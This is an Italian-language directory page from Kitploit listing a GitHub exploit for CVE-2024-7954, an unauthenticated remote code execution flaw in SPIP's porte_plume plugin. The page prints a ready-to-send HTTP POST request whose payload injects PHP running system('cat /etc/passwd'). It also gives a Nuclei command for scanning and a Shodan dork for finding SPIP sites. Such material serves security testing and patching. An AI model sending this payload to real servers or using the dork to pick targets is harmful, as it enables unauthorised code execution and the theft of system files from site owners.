Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE_CVE-2024-7954 — Exploit per CVE-2024-7954, un'esecuzione remota di codice non autenticata nel plugin porte_plume di SPIP, con un template Nuclei e una dork Shodan per il rilevamento. | Kitploit
Strumenti/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

Exploit per CVE-2024-7954, un'esecuzione remota di codice non autenticata nel plugin porte_plume di SPIP, con un template Nuclei e una dork Shodan per il rilevamento.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
51 anno faNon ancora revisionato
Condividi

RCE_CVE-2024-7954

Descrizione:

Il plugin porte_plume utilizzato da SPIP prima delle versioni 4.30-alpha2, 4.2.13 e 4.1.16 è vulnerabile a un'esecuzione di codice arbitrario. Un attaccante remoto e non autenticato può eseguire PHP arbitrario come utente SPIP inviando una richiesta HTTP appositamente predisposta. (CRITICO)

Exploit:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Strumento utilizzato:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Riferimento:

1) https://github.com/fa-rrel
Scarica lo strumento